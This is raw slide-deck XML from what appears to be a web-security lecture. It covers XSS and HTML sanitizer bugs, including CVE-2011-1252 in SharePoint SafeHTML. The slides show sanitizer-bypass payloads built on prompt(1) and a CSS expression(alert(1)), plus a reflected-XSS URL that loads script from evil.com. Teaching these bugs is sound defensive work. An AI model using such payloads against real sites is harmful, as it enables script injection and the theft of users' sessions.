              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>scrRedirecRedirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> 302t 302ipt&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"&gt;prompt(1);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3486722"/>
            <a:ext cx="8686802" cy="961802"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="9144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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Observations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Removing data from markup can create</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS where it didn’t previously exist</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML Sanitization:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Bug 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156200" y="4210051"/>
            <a:ext cx="3530600" cy="2146300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50134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57200" y="1367894"/>
            <a:ext cx="8686802" cy="2139047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEFF7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="9144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900"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2011-1252 / MS11-074</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SharePoint / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SafeHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>UnsafeHTMLWhenUsingIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(String))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Input: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;style&gt;div{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>color:rgb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(0,0,0)&amp;a=expression(alert(1))}&lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;amp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Output: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;style&gt;div{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>color:rgb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(0,0,0)&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>amp;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>expressio</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(alert(1))}&lt;/style&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3572635"/>
            <a:ext cx="8686802" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCEFF7"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="182880" tIns="91440" rIns="9144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pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Observations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitizer created a delimiter (the semi-colon)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Legacy IE CSS expression syntax required to execute script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitizer: "expression" is considered to be</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>in a benign location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-192024">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser: "expression" is considered to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>be the RHS of a CSS property set operation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML sanitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bug 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5194300" y="4210051"/>
            <a:ext cx="3492500" cy="2146300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="796884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Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>saveComment?comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>x.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569275" y="2454153"/>
            <a:ext cx="678754" cy="1780155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720"/>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6</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7</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8</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9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200" algn="r">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1598350" y="2484035"/>
            <a:ext cx="6426255" cy="1780155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>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457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;h3&gt;Comment Section:&lt;/h3&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Comment 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
